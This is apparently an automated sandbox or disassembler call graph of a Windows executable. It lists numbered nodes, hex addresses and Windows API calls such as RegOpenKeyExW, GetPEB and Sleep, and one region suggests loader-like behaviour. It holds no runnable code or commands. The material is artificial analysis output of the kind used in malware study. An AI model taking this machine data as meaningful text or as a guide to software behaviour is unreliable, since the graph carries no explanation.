_wcslen 86440->86442 86498 40c600 86441->86498 86445 402180 86442->86445 86446 40219e 86442->86446 86444 426db5 86444->86421 86497 403bd0 52 API calls moneypunct 86445->86497 86448 4013a0 52 API calls 86446->86448 86449 4021a5 86448->86449 86451 426db7 86449->86451 86452 4115d7 52 API calls 86449->86452 86450 402187 _memmove 86450->86421 86452->86450 86453->86431 86455 40e0b2 86454->86455 86456 40e0a8 86454->86456 86455->86431 86510 403c30 52 API calls _memmove 86456->86510 86458->86428 86459->86434 86462 4115e1 _malloc 86460->86462 86463 4013e4 86462->86463 86466 4115fd std::exception::exception 86462->86466 86474 4135bb 86462->86474 86471 4013a0 86463->86471 86465 411645 86490 418105 RaiseException 86465->86490 86470 41163b 86466->86470 86488 41130a 51 API calls __cinit 86466->86488 86469 411656 86489 4180af 46 API calls std::exception::operator= 86470->86489 86472 4115d7 52 API calls 86471->86472 86473 4013a7 86472->86473 86473->86417 86473->86418 86475 413638 _malloc 86474->86475 86479 4135c9 _malloc 86474->86479 86496 417f77 46 API calls __getptd_noexit 86475->86496 86478 4135f7 RtlAllocateHeap 86478->86479 86487 413630 86478->86487 86479->86478 86481 413624 86479->86481 86482 4135d4 86479->86482 86485 413622 86479->86485 86494 417f77 46 API calls __getptd_noexit 86481->86494 86482->86479 86491 418901 46 API calls 2 library calls 86482->86491 86492 418752 46 API calls 9 library calls 86482->86492 86493 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86482->86493 86495 417f77 46 API calls __getptd_noexit 86485->86495 86487->86462 86488->86470 86489->86465 86490->86469 86491->86482 86492->86482 86494->86485 86495->86487 86496->86487 86497->86450 86499 40c619 86498->86499 86500 40c60a 86498->86500 86499->86444 86500->86499 86503 4026f0 86500->86503 86502 426d7a _memmove 86502->86444 86504 426873 86503->86504 86505 4026ff 86503->86505 86506 4013a0 52 API calls 86504->86506 86505->86502 86507 42687b 86506->86507 86508 4115d7 52 API calls 86507->86508 86509 42689e _memmove 86508->86509 86509->86502 86510->86455 86511->86405 86512 40bd20 86513 428194 86512->86513 86514 40bd2d 86512->86514 86516 40bd43 86513->86516 86518 4281bc 86513->86518 86520 4281b2 86513->86520 86515 40bd37 86514->86515 86535 4531b1 85 API calls 5 library calls 86514->86535 86524 40bd50 86515->86524 86534 45e987 86 API calls moneypunct 86518->86534 86533 40b510 VariantClear 86520->86533 86523 4281ba 86525 426cf1 86524->86525 86526 40bd63 86524->86526 86545 44cde9 52 API calls _memmove 86525->86545 86536 40bd80 86526->86536 86529 40bd73 86529->86516 86530 426cfc 86531 40e0a0 52 API calls 86530->86531 86532 426d02 86531->86532 86533->86523 86534->86514 86535->86515 86537 40bd8e 86536->86537 86544 40bdb7 _memmove 86536->86544 86538 40bded 86537->86538 86539 40bdad 86537->86539 86537->86544 86540 4115d7 52 API calls 86538->86540 86546 402f00 86539->86546 86542 40bdf6 86540->86542 86543 4115d7 52 API calls 86542->86543 86542->86544 86543->86544 86544->86529 86545->86530 86547 402f10 86546->86547 86548 402f0c 86546->86548 86549 4115d7 52 API calls 86547->86549 86550 4268c3 86547->86550 86548->86544 86551 402f51 moneypunct _memmove 86549->86551 86551->86544 86552 425ba2 86557 40e360 86552->86557 86554 425bb4 86573 41130a 51 API calls __cinit 86554->86573 86556 425bbe 86558 4115d7 52 API calls 86557->86558 86559 40e3ec GetModuleFileNameW 86558->86559 86574 413a0e 86559->86574 86561 40e421 _wcsncat 86577 413a9e 86561->86577 86564 4115d7 52 API calls 86565 40e45e _wcscpy 86564->86565 86580 40bc70 86565->86580 86569 40e4a9 86569->86554 86570 401c90 52 API calls 86571 40e4a1 _wcscat _wcslen _wcsncpy 86570->86571 86571->86569 86571->86570 86572 4115d7 52 API calls 86571->86572 86572->86571 86573->86556 86599 413801 86574->86599 86629 419efd 86577->86629 86581 4115d7 52 API calls 86580->86581 86582 40bc98 86581->86582 86583 4115d7 52 API calls 86582->86583 86584 40bca6 86583->86584 86585 40e4c0 86584->86585 86641 403350 86585->86641 86587 40e4cb RegOpenKeyExW 86588 427190 RegQueryValueExW 86587->86588 86589 40e4eb 86587->86589 86590 4271b0 86588->86590 86591 42721a RegCloseKey 86588->86591 86589->86571 86592 4115d7 52 API calls 86590->86592 86591->86571 86593 4271cb 86592->86593 86648 43652f 52 API calls 86593->86648 86595 4271d8 RegQueryValueExW 86596 42720e 86595->86596 86597 4271f7 86595->86597 86596->86591 86598 402160 52 API calls 86597->86598 86598->86596 86600 41381a 86599->86600 86601 41389e 86599->86601 86600->86601 86611 41388a 86600->86611 86621 419e30 46 API calls __write_nolock 86600->86621 86602 4139e8 86601->86602 86603 413a00 86601->86603 86626 417f77 46 API calls __getptd_noexit 86602->86626 86628 417f77 46 API calls __getptd_noexit 86603->86628 86606 4139ed 86627 417f25 10 API calls __write_nolock 86606->86627 86609 41396c 86609->86601 86612 41397a 86609->86612 86616 413967 86609->86616 86610 413929 86610->86601 86613 413945 86610->86613 86623 419e30 46 API calls __write_nolock 86610->86623 86611->86601 86620 413909 86611->86620 86622 419e30 46 API calls __write_nolock 86611->86622 86625 419e30 46 API calls __write_nolock 86612->86625 86613->86601 86615 41395b 86613->86615 86613->86616 86624 419e30 46 API calls __write_nolock 86615->86624 86616->86561 86620->86609 86620->86610 86621->86611 86622->86620 86623->86613 86624->86616 86625->86616 86626->86606 86627->86616 86628->86616 86630 419f13 86629->86630 86631 419f0e 86629->86631 86638 417f77 46 API calls __getptd_noexit 86630->86638 86631->86630 86637 419f2b 86631->86637 86633 419f18 86639 417f25 10 API calls __write_nolock 86633->86639 86636 40e454 86636->86564 86637->86636 86640 417f77 46 API calls __getptd_noexit 86637->86640 86638->86633 86639->86636 86640->86633 86642 403367 86641->86642 86643 403358 86641->86643 86644 4115d7 52 API calls 86642->86644 86643->86587 86645 403370 86644->86645 86646 4115d7 52 API calls 86645->86646 86647 40339e 86646->86647 86647->86587 86648->86595 86649 3dbcdf8 86663 3dbaa38 86649->86663 86651 3dbcee9 86666 3dbcce8 86651->86666 86669 3dbdf38 GetPEB 86663->86669 86665 3dbb0c3 86665->86651 86667 3dbccf1 Sleep 86666->86667 86668 3dbccff 86667->86668 86670 3dbdf62 86669->86670 86670->86665 86671 428905 86672 4115d7 52 API calls 86671->86672 86673 42890c 86672->86673 86674 428945 86673->86674 86675 42891f 86673->86675 86677 4115d7 52 API calls 86674->86677 86676 4115d7 52 API calls 86675->86676 86678 428925 _memmove 86676->86678 86679 42894c 86677->86679 86680 42b14b 86687 40bc10 86680->86687 86682 42b159 86698 4096a0 86682->86698 86684 42b177 86825 44b92d VariantClear 86684->86825 86686 42bc5b 86688 40bc24 86687->86688 86689 40bc17 86687->86689 86691 40bc2a 86688->86691 86692 40bc3c 86688->86692 86826 408e80 86689->86826 86694 408e80 VariantClear 86691->86694 86695 4115d7 52 API calls 86692->86695 86696 40bc33 86694->86696 86697 40bc43 86695->86697 86696->86682 86697->86682 86699 4096c6 _wcslen 86698->86699 86700 40a70c moneypunct _memmove 86699->86700 86701 4115d7 52 API calls 86699->86701 86704 4013a0 52 API calls 86700->86704 86702 4096fa _memmove 86701->86702 86703 4115d7 52 API calls 86702->86703 86705 40971b 86703->86705 86706 4297aa 86704->86706 86705->86700 86707 409749 CharUpperBuffW 86705->86707 86712 40976a moneypunct 86705->86712 86708 4115d7 52 API calls 86706->86708 86707->86712 86709 4297d1 _memmove 86708->86709 86999 45e737 90 API calls 3 library calls 86709->86999 86714 4097e5 moneypunct 86712->86714 86942 47dcbb 199 API calls 86712->86942 86713 408f40 VariantClear 86715 42ae92 86713->86715 86714->86709 86718 409aa2 86714->86718 86720 40a689 86714->86720 86722 4115d7 52 API calls 86714->86722 86729 429a46 VariantClear 86714->86729 86730 40a6af moneypunct _memmove 86714->86730 86736 408f40 VariantClear 86714->86736 86750 4299d9 86714->86750 86754 429abd 86714->86754 86769 42a452 86714->86769 86900 40a780 86714->86900 86943 40c2c0 86714->86943 86961 40c4e0 197 API calls 86714->86961 86963 40ba10 86714->86963 86969 40e270 VariantClear moneypunct 86714->86969 87000 410c60 VariantClear moneypunct 86715->87000 86717 42aea4 86718->86709 86719 409afe 86718->86719 86721 4115d7 52 API calls 86718->86721 86725 4115d7 52 API calls 86719->86725 86762 409b2a 86719->86762 86723 4115d7 52 API calls 86720->86723 86721->86719 86722->86714 86723->86730 86727 429d31 86725->86727 86726 429dbe 86728 429dd3 86726->86728 86974 40b400 VariantClear VariantClear moneypunct 86726->86974 86733 429d42 86727->86733 86970 44a801 52 API calls 86727->86970 86789 409b4d moneypunct _memmove 86728->86789 86975 40e1c0 VariantClear moneypunct 86728->86975 86729->86714 86748 4115d7 52 API calls 86730->86748 86731 409fd2 86735 40a045 86731->86735 86785 42a3f5 86731->86785 86740 40e0a0 52 API calls 86733->86740 86738 4115d7 52 API calls 86735->86738 86736->86714 86743 40a04c 86738->86743 86744 429d57 86740->86744 86749 40a0a7 86743->86749 86834 4091e0 86743->86834 86971 453443 52 API calls 86744->86971 86746 42a42f 86987 45e737 90 API calls 3 library calls 86746->86987 86748->86700 86770 40a0af 86749->86770 86988 40c790 VariantClear moneypunct 86749->86988 86753 408f40 VariantClear 86750->86753 86756 4299e2 86753->86756 86754->86684 86755 429d88 86972 453443 52 API calls 86755->86972 86962 410c60 VariantClear moneypunct 86756->86962 86762->86726 86762->86789 86973 40b400 VariantClear VariantClear moneypunct 86762->86973 86763 402780 52 API calls 86763->86789 86765 4115d7 52 API calls 86765->86789 86766 44a801 52 API calls 86766->86789 86768 408f40 VariantClear 86799 40a162 moneypunct _memmove 86768->86799 86769->86713 86771 40a11b 86770->86771 86772 42a4b4 VariantClear 86770->86772 86770->86799 86778 40a12d moneypunct 86771->86778 86989 40e270 VariantClear moneypunct 86771->86989 86772->86778 86773 40a780 197 API calls 86773->86789 86774 408e80 VariantClear 86774->86789 86777 4115d7 52 API calls 86777->86799 86778->86777 86778->86799 86780 408e80 VariantClear 86780->86799 86781 42a74d VariantClear 86781->86799 86782 41130a 51 API calls __cinit 86782->86789 86783 40a368 86786 42aad4 86783->86786 86793 40a397 86783->86793 86784 40e270 VariantClear 86784->86799 86986 47390f VariantClear 86785->86986 86992 46fe90 VariantClear VariantClear moneypunct 86786->86992 86787 42a886 VariantClear 86787->86799 86788 42a7e4 VariantClear 86788->86799 86789->86700 86789->86731 86789->86746 86789->86763 86789->86765 86789->86766 86789->86773 86789->86774 86789->86782 86789->86785 86792 409c95 86789->86792 86976 45f508 52 API calls 86789->86976 86977 401980 86789->86977 86985 403e10 53 API calls 86789->86985 86790 40a3ce 86803 40a3d9 moneypunct 86790->86803 86993 40b400 VariantClear VariantClear moneypunct 86790->86993 86792->86684 86793->86790 86818 40a42c moneypunct 86793->86818 86941 40b400 VariantClear VariantClear moneypunct 86793->86941 86796 4115d7 52 API calls 86796->86799 86797 42abaf 86801 42abd4 VariantClear 86797->86801 86809 40a4ee moneypunct 86797->86809 86798 4115d7 52 API calls 86802 42a5a6 VariantInit VariantCopy 86798->86802 86799->86768 86799->86780 86799->86781 86799->86783 86799->86784 86799->86786 86799->86787 86799->86788 86799->86796 86799->86798 86990 470870 52 API calls 86799->86990 86991 44ccf1 VariantClear moneypunct 86799->86991 86800 40a4dc 86800->86809 86995 40e270 VariantClear moneypunct 86800->86995 86801->86809 86802->86799 86805 42a5c6 VariantClear 86802->86805 86804 40a41a 86803->86804 86811 42ab44 VariantClear 86803->86811 86803->86818 86804->86818 86994 40e270 VariantClear moneypunct 86804->86994 86805->86799 86806 42ac4f 86812 42ac79 VariantClear 86806->86812 86816 40a546 moneypunct 86806->86816 86809->86806 86810 40a534 86809->86810 86810->86816 86996 40e270 VariantClear moneypunct 86810->86996 86811->86818 86812->86816 86813 42ad28 86819 42ad4e VariantClear 86813->86819 86824 40a583 moneypunct 86813->86824 86816->86813 86817 40a571 86816->86817 86817->86824 86997 40e270 VariantClear moneypunct 86817->86997 86818->86797 86818->86800 86819->86824 86821 40a650 moneypunct 86821->86684 86822 42ae0e VariantClear 86822->86824 86824->86821 86824->86822 86998 40e270 VariantClear moneypunct 86824->86998 86825->86686 86827 408e88 86826->86827 86829 408e94 86826->86829 86830 408f40 86827->86830 86829->86682 86832 408f48 moneypunct 86830->86832 86831 4265c7 VariantClear 86833 408f55 moneypunct 86831->86833 86832->86831 86832->86833 86833->86829 86835 409202 86834->86835 86836 42d7ad 86834->86836 86894 409216 moneypunct 86835->86894 87145 410940 328 API calls 86835->87145 87148 45e737 90 API calls 3 library calls 86836->87148 86839 409386 86840 40939c 86839->86840 87146 40f190 10 API calls 86839->87146 86840->86749 86842 4095b2 86842->86840 86843 4095bf 86842->86843 87147 401a50 328 API calls 86843->87147 86844 409253 PeekMessageW 86844->86894 86846 40d410 VariantClear 86846->86894 86847 42d8cd Sleep 86847->86894 86848 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86848->86840 86851 4095f9 86848->86851 86850 42e13b 87166 40d410 VariantClear 86850->87166 86853 42e158 TranslateMessage DispatchMessageW GetMessageW 86851->86853 86853->86853 86856 42e188 86853->86856 86855 409567 PeekMessageW 86855->86894 86856->86840 86859 46fdbf 108 API calls 86898 4094e0 86859->86898 86860 46f3c1 107 API calls 86860->86894 86861 40e0a0 52 API calls 86861->86894 86862 409551 TranslateMessage DispatchMessageW 86862->86855 86864 42dcd2 WaitForSingleObject 86865 42dcf0 GetExitCodeProcess CloseHandle 86864->86865 86864->86894 87155 40d410 VariantClear 86865->87155 86867 44c29d 52 API calls 86867->86898 86868 42dd3d Sleep 86868->86898 86869 47d33e 306 API calls 86869->86894 86872 4094cf Sleep 86872->86898 86874 42d94d timeGetTime 87151 465124 53 API calls 86874->87151 86876 40c620 timeGetTime 86876->86898 86879 42dd89 CloseHandle 86879->86898 86881 465124 53 API calls 86881->86898 86882 42de19 GetExitCodeProcess CloseHandle 86882->86898 86884 401b10 52 API calls 86884->86898 86886 42de88 Sleep 86886->86894 86888 4096a0 306 API calls 86888->86894 86889 401980 53 API calls 86889->86898 86890 45e737 90 API calls 86890->86894 86893 42e0cc VariantClear 86893->86894 86894->86839 86894->86844 86894->86846 86894->86847 86894->86850 86894->86855 86894->86860 86894->86861 86894->86862 86894->86864 86894->86868 86894->86869 86894->86872 86894->86874 86894->86888 86894->86890 86894->86893 86895 408f40 VariantClear 86894->86895 86894->86898 87001 4091b0 86894->87001 87059 40afa0 86894->87059 87085 408fc0 86894->87085 87120 408cc0 86894->87120 87134 40d150 86894->87134 87139 40d170 86894->87139 87149 465124 53 API calls 86894->87149 87150 40c620 timeGetTime 86894->87150 87165 40e270 VariantClear moneypunct 86894->87165 86895->86894 86898->86859 86898->86867 86898->86876 86898->86879 86898->86881 86898->86882 86898->86884 86898->86886 86898->86889 86898->86894 86899 408f40 VariantClear 86898->86899 87152 45178a 54 API calls 86898->87152 87153 47d33e 328 API calls 86898->87153 87154 453bc6 54 API calls 86898->87154 87156 40d410 VariantClear 86898->87156 87157 443d19 67 API calls _wcslen 86898->87157 87158 4574b4 VariantClear 86898->87158 87159 403cd0 86898->87159 87163 4731e1 VariantClear 86898->87163 87164 4331a2 6 API calls 86898->87164 86899->86898 86901 40a7a6 86900->86901 86902 40ae8c 86900->86902 86904 4115d7 52 API calls 86901->86904 87713 41130a 51 API calls __cinit 86902->87713 86911 40a7c6 moneypunct _memmove 86904->86911 86905 40a86d 86906 40a878 moneypunct 86905->86906 86919 40abd1 86905->86919 86908 40a884 moneypunct 86906->86908 86915 408f40 VariantClear 86906->86915 86908->86714 86909 401b10 52 API calls 86909->86911 86910 42b791 VariantClear 86910->86911 86911->86905 86911->86909 86911->86910 86912 40b5f0 89 API calls 86911->86912 86913 408e80 VariantClear 86911->86913 86914 42ba2d VariantClear 86911->86914 86916 40e270 VariantClear 86911->86916 86917 42b459 VariantClear 86911->86917 86918 42bb6a 86911->86918 86911->86919 86920 40bc10 53 API calls 86911->86920 86921 408cc0 190 API calls 86911->86921 86923 42b6f6 VariantClear 86911->86923 86925 4115d7 52 API calls 86911->86925 86926 42bbf5 86911->86926 86927 4115d7 52 API calls 86911->86927 86931 408f40 VariantClear 86911->86931 86935 42bc37 86911->86935 86940 4530c9 VariantClear 86911->86940 87714 45308a 53 API calls 86911->87714 87715 470870 52 API calls 86911->87715 87716 457f66 87 API calls __write_nolock 86911->87716 87717 472f47 127 API calls 86911->87717 86912->86911 86913->86911 86914->86911 86915->86906 86916->86911 86917->86911 87721 44b92d VariantClear 86918->87721 87718 45e737 90 API calls 3 library calls 86919->87718 86920->86911 86921->86911 86923->86911 86924 42bc5b 86924->86714 86925->86911 87719 45e737 90 API calls 3 library calls 86926->87719 86929 42b5b3 VariantInit VariantCopy 86927->86929 86929->86911 86932 42b5d7 VariantClear 86929->86932 86931->86911 86932->86911 87720 45e737 90 API calls 3 library calls 86935->87720 86938 42bc48 86938->86918 86939 408f40 VariantClear 86938->86939 86939->86918 86940->86911 86941->86790 86942->86712 86944 40c2c7 86943->86944 86945 40c30e 86943->86945 86946 40c2d3 86944->86946 86947 426c79 86944->86947 86948 40c315 86945->86948 86949 426c2b 86945->86949 87722 403ea0 52 API calls __cinit 86946->87722 87727 4534e3 52 API calls 86947->87727 86953 40c321 86948->86953 86956 426c5a 86948->86956 86951 426c4b 86949->86951 86952 426c2e 86949->86952 87725 4534e3 52 API calls 86951->87725 86960 40c2de 86952->86960 87724 4534e3 52 API calls 86952->87724 87723 403ea0 52 API calls __cinit 86953->87723 87726 4534e3 52 API calls 86956->87726 86960->86714 86960->86960 86961->86714 86962->86821 86964 40ba49 86963->86964 86965 40ba1b moneypunct _memmove 86963->86965 86967 4115d7 52 API calls 86964->86967 86966 4115d7 52 API calls 86965->86966 86968 40ba22 86966->86968 86967->86965 86968->86714 86969->86714 86970->86733 86971->86755 86972->86762 86973->86726 86974->86728 86975->86789 86976->86789 86978 4019a3 86977->86978 86984 401985 86977->86984 86979 4019b8 86978->86979 86978->86984 87729 403e10 53 API calls 86979->87729 86981 40199f 86981->86789 86983 4019c4 86983->86789 86984->86981 87728 403e10 53 API calls 86984->87728 86985->86789 86986->86746 86987->86769 86988->86749 86989->86778 86990->86799 86991->86799 86992->86790 86993->86803 86994->86818 86995->86809 86996->86816 86997->86824 86998->86824 86999->86769 87000->86717 87002 42c5fe 87001->87002 87017 4091c6 87001->87017 87003 40bc70 52 API calls 87002->87003 87002->87017 87004 42c64e InterlockedIncrement 87003->87004 87005 42c665 87004->87005 87010 42c697 87004->87010 87008 42c672 InterlockedDecrement Sleep InterlockedIncrement 87005->87008 87005->87010 87006 42c737 InterlockedDecrement 87007 42c74a 87006->87007 87011 408f40 VariantClear 87007->87011 87008->87005 87008->87010 87009 42c731 87009->87006 87010->87006 87010->87009 87012 408e80 VariantClear 87010->87012 87013 42c752 87011->87013 87014 42c6cf 87012->87014 87176 410c60 VariantClear moneypunct 87013->87176 87167 45340c 87014->87167 87017->86894 87018 42c6db 87019 402160 52 API calls 87018->87019 87020 42c6e5 87019->87020 87021 45340c 85 API calls 87020->87021 87022 42c6f1 87021->87022 87173 40d200 52 API calls 2 library calls 87022->87173 87024 42c6fb 87174 465124 53 API calls 87024->87174 87026 42c715 87027 42c76a 87026->87027 87028 42c719 87026->87028 87177 401b10 87027->87177 87175 46fe32 VariantClear 87028->87175 87031 42c77e 87032 401980 53 API calls 87031->87032 87033 42c796 87032->87033 87034 42c812 87033->87034 87038 42c864 87033->87038 87039 40ba10 52 API calls 87033->87039 87183 46fe32 VariantClear 87034->87183 87036 42c82a InterlockedDecrement 87184 46ff07 54 API calls 87036->87184 87185 45e737 90 API calls 3 library calls 87038->87185 87039->87033 87040 42c9ec 87187 47d33e 328 API calls 87040->87187 87043 42c9fe 87188 46feb1 VariantClear VariantClear 87043->87188 87045 408f40 VariantClear 87055 42c849 87045->87055 87046 42ca08 87048 401b10 52 API calls 87046->87048 87047 408f40 VariantClear 87049 42c891 87047->87049 87050 42ca15 87048->87050 87186 410c60 VariantClear moneypunct 87049->87186 87053 40c2c0 52 API calls 87050->87053 87052 401980 53 API calls 87052->87055 87056 42c874 87053->87056 87054 402780 52 API calls 87054->87055 87055->87040 87055->87045 87055->87052 87055->87054 87057 40a780 197 API calls 87055->87057 87056->87047 87058 42ca59 87056->87058 87057->87055 87058->87058 87060 40afc4 87059->87060 87061 40b156 87059->87061 87062 40afd5 87060->87062 87063 42d1e3 87060->87063 87190 45e737 90 API calls 3 library calls 87061->87190 87067 40a780 197 API calls 87062->87067 87083 40b11a moneypunct 87062->87083 87191 45e737 90 API calls 3 library calls 87063->87191 87066 40b143 87066->86894 87069 40b00a 87067->87069 87068 42d1f8 87072 408f40 VariantClear 87068->87072 87069->87068 87073 40b012 87069->87073 87071 42d4db 87071->87071 87072->87066 87074 40b04a 87073->87074 87075 42d231 VariantClear 87073->87075 87077 40b094 moneypunct 87073->87077 87080 40b05c moneypunct 87074->87080 87192 40e270 VariantClear moneypunct 87074->87192 87075->87080 87076 40b108 87076->87083 87193 40e270 VariantClear moneypunct 87076->87193 87077->87076 87082 42d425 moneypunct 87077->87082 87078 42d45a VariantClear 87078->87083 87080->87077 87081 4115d7 52 API calls 87080->87081 87081->87077 87082->87078 87082->87083 87083->87066 87194 45e737 90 API calls 3 library calls 87083->87194 87086 408fff 87085->87086 87091 40900d 87085->87091 87241 403ea0 52 API calls __cinit 87086->87241 87089 42c3f6 87244 45e737 90 API calls 3 library calls 87089->87244 87091->87089 87092 40a780 197 API calls 87091->87092 87093 42c44a 87091->87093 87095 42c47b 87091->87095 87097 42c4cb 87091->87097 87098 42c564 87091->87098 87104 42c548 87091->87104 87105 409112 87091->87105 87106 42c528 87091->87106 87108 4090df 87091->87108 87113 4090ea 87091->87113 87119 4090f2 moneypunct 87091->87119 87243 4534e3 52 API calls 87091->87243 87245 40c4e0 197 API calls 87091->87245 87092->87091 87246 45e737 90 API calls 3 library calls 87093->87246 87247 451b42 61 API calls 87095->87247 87195 47faae 87097->87195 87101 408f40 VariantClear 87098->87101 87101->87119 87102 42c491 87102->87119 87248 45e737 90 API calls 3 library calls 87102->87248 87103 42c4da 87103->87119 87249 45e737 90 API calls 3 library calls 87103->87249 87251 45e737 90 API calls 3 library calls 87104->87251 87105->87104 87111 40912b 87105->87111 87250 45e737 90 API calls 3 library calls 87106->87250 87108->87113 87114 408e80 VariantClear 87108->87114 87111->87119 87242 403e10 53 API calls 87111->87242 87115 408f40 VariantClear 87113->87115 87114->87113 87115->87119 87117 40914b 87118 408f40 VariantClear 87117->87118 87118->87119 87119->86894 87458 408d90 87120->87458 87122 429778 87486 410c60 VariantClear moneypunct 87122->87486 87124 429780 87125 408cf9 87125->87122 87126 42976c 87125->87126 87128 408d2d 87125->87128 87485 45e737 90 API calls 3 library calls 87126->87485 87474 403d10 87128->87474 87131 408d71 moneypunct 87131->86894 87132 408f40 VariantClear 87133 408d45 moneypunct 87132->87133 87133->87131 87133->87132 87135 425c87 87134->87135 87136 40d15f 87134->87136 87137 425cc7 87135->87137 87138 425ca1 TranslateAcceleratorW 87135->87138 87136->86894 87138->87136 87140 42602f 87139->87140 87141 40d17f 87139->87141 87140->86894 87142 40d18c 87141->87142 87143 42608e IsDialogMessageW 87141->87143 87712 430c46 GetClassLongW 87141->87712 87142->86894 87143->87141 87143->87142 87145->86894 87146->86842 87147->86848 87148->86894 87149->86894 87150->86894 87151->86894 87152->86898 87153->86898 87154->86898 87155->86898 87156->86898 87157->86898 87158->86898 87160 403cdf 87159->87160 87161 408f40 VariantClear 87160->87161 87162 403ce7 87161->87162 87162->86886 87163->86898 87164->86898 87165->86894 87166->86839 87168 453439 87167->87168 87169 453419 87167->87169 87168->87018 87170 45342f 87169->87170 87189 4531b1 85 API calls 5 library calls 87169->87189 87170->87018 87172 453425 87172->87018 87173->87024 87174->87026 87175->87009 87176->87017 87178 401b16 _wcslen 87177->87178 87179 4115d7 52 API calls 87178->87179 87182 401b63 87178->87182 87180 401b4b _memmove 87179->87180 87181 4115d7 52 API calls 87180->87181 87181->87182 87182->87031 87183->87036 87184->87055 87185->87056 87186->87017 87187->87043 87188->87046 87189->87172 87190->87063 87191->87068 87192->87080 87193->87083 87194->87071 87196 408e80 VariantClear 87195->87196 87199 47fb02 87196->87199 87200 47fc59 87199->87200 87213 47fc2b 87199->87213 87218 47fcd4 87199->87218 87221 408e80 VariantClear 87199->87221 87227 408f40 VariantClear 87199->87227 87237 47fc1d 87199->87237 87252 475a67 87199->87252 87280 47b291 87199->87280 87291 46fe32 VariantClear 87199->87291 87201 40a780 197 API calls 87200->87201 87203 47fc6a 87201->87203 87206 47fc7d 87203->87206 87207 47fc8c 87203->87207 87203->87213 87204 408f40 VariantClear 87205 47fc33 87204->87205 87208 408f40 VariantClear 87205->87208 87294 45e737 90 API calls 3 library calls 87206->87294 87211 40ba10 52 API calls 87207->87211 87209 47fc3b 87208->87209 87212 408f40 VariantClear 87209->87212 87214 47fc98 87211->87214 87215 47fc43 87212->87215 87213->87204 87295 47b2f4 144 API calls 87214->87295 87293 410c60 VariantClear moneypunct 87215->87293 87217 47fca7 87220 408f40 VariantClear 87217->87220 87223 408f40 VariantClear 87218->87223 87224 47fcb1 87220->87224 87221->87199 87222 47fc4b 87222->87103 87225 47fcdc 87223->87225 87226 408f40 VariantClear 87224->87226 87228 408f40 VariantClear 87225->87228 87229 47fcb9 87226->87229 87227->87199 87230 47fce4 87228->87230 87231 408f40 VariantClear 87229->87231 87232 408f40 VariantClear 87230->87232 87233 47fcc1 87231->87233 87234 47fcec 87232->87234 87296 410c60 VariantClear moneypunct 87233->87296 87297 410c60 VariantClear moneypunct 87234->87297 87292 45e538 90 API calls 3 library calls 87237->87292 87238 47fcf4 87238->87103 87239 47fcc9 87239->87103 87241->87091 87242->87117 87243->87091 87244->87119 87245->87091 87246->87119 87247->87102 87248->87119 87249->87119 87250->87119 87251->87098 87253 475ae5 87252->87253 87257 475ac5 87252->87257 87306 45e737 90 API calls 3 library calls 87253->87306 87255 475afe 87256 408f40 VariantClear 87255->87256 87262 475b06 87256->87262 87257->87253 87258 475b42 87257->87258 87259 402780 52 API calls 87257->87259 87298 402780 87258->87298 87259->87257 87261 475c7c 87263 408f40 VariantClear 87261->87263 87262->87199 87266 475c84 87263->87266 87264 40c2c0 52 API calls 87270 475b60 87264->87270 87265 40a780 197 API calls 87265->87270 87266->87199 87267 475cc7 87269 408f40 VariantClear 87267->87269 87268 40ba10 52 API calls 87268->87270 87273 475ca8 87269->87273 87270->87261 87270->87264 87270->87265 87270->87267 87270->87268 87271 475cd5 87270->87271 87272 408f40 VariantClear 87270->87272 87278 475ca0 87270->87278 87307 40c4e0 197 API calls 87270->87307 87308 45e737 90 API calls 3 library calls 87271->87308 87272->87270 87273->87199 87276 475ce8 87277 408f40 VariantClear 87276->87277 87277->87273 87279 408f40 VariantClear 87278->87279 87279->87273 87281 47b2e7 87280->87281 87282 47b2a5 87280->87282 87281->87199 87309 40e710 87282->87309 87285 47b2b7 87320 47974b 87285->87320 87286 47b2cf 87287 47974b 144 API calls 87286->87287 87290 47b2df 87287->87290 87289 47b2c7 87289->87199 87290->87199 87291->87199 87292->87213 87293->87222 87294->87213 87295->87217 87296->87239 87297->87238 87299 402827 87298->87299 87302 402790 moneypunct _memmove 87298->87302 87301 4115d7 52 API calls 87299->87301 87300 4115d7 52 API calls 87303 402797 87300->87303 87301->87302 87302->87300 87304 4115d7 52 API calls 87303->87304 87305 4027bd 87303->87305 87304->87305 87305->87270 87306->87255 87307->87270 87308->87276 87310 408f40 VariantClear 87309->87310 87311 40e71b 87310->87311 87312 4115d7 52 API calls 87311->87312 87313 40e729 87312->87313 87314 426bdc 87313->87314 87316 40e734 87313->87316 87315 426be7 87314->87315 87317 40bc70 52 API calls 87314->87317 87316->87315 87318 401b10 52 API calls 87316->87318 87317->87315 87319 40e743 87318->87319 87319->87285 87319->87286 87321 479786 87320->87321 87322 479aed 87320->87322 87321->87322 87325 479798 87321->87325 87389 451b42 61 API calls 87322->87389 87324 479b00 87324->87289 87326 4797a2 87325->87326 87327 4797be 87325->87327 87382 451b42 61 API calls 87326->87382 87329 4797c7 87327->87329 87330 4797e3 87327->87330 87383 451b42 61 API calls 87329->87383 87360 441eba 87330->87360 87331 4797b5 87331->87289 87334 4797da 87334->87289 87335 4797f7 87336 479815 87335->87336 87337 4797fe 87335->87337 87341 47983c 87336->87341 87365 451d2b 87336->87365 87384 451b42 61 API calls 87337->87384 87339 47980c 87339->87289 87345 4798e6 87341->87345 87376 479714 87341->87376 87342 47994b VariantInit 87347 479980 __setmbcp_nolock 87342->87347 87345->87342 87346 479916 VariantClear 87345->87346 87346->87345 87348 479a2c 87347->87348 87349 479a44 87347->87349 87350 479a0b 87347->87350 87386 451b42 61 API calls 87348->87386 87387 468070 104 API calls moneypunct 87349->87387 87350->87348 87351 479a12 87350->87351 87385 451b42 61 API calls 87351->87385 87355 479a24 87356 479aca VariantClear 87355->87356 87357 479adb 87356->87357 87357->87289 87358 479a50 87358->87356 87388 468070 104 API calls moneypunct 87358->87388 87361 441f12 87360->87361 87362 441ecc _wcslen 87360->87362 87361->87335 87362->87361 87390 410160 87362->87390 87364 441ede 87364->87335 87367 451d5e 87365->87367 87366 451e93 SysFreeString 87370 451ea0 87366->87370 87367->87366 87368 451f21 87367->87368 87369 451d68 87367->87369 87367->87370 87368->87370 87371 451fab 87368->87371 87372 451f6d lstrcmpiW 87368->87372 87373 451f7f SysFreeString 87368->87373 87369->87341 87370->87369 87394 44a545 RaiseException 87370->87394 87371->87341 87372->87373 87375 451fc7 SysFreeString 87372->87375 87373->87368 87375->87370 87377 479728 87376->87377 87395 479500 VariantInit 87377->87395 87379 479730 87434 437063 VariantClear 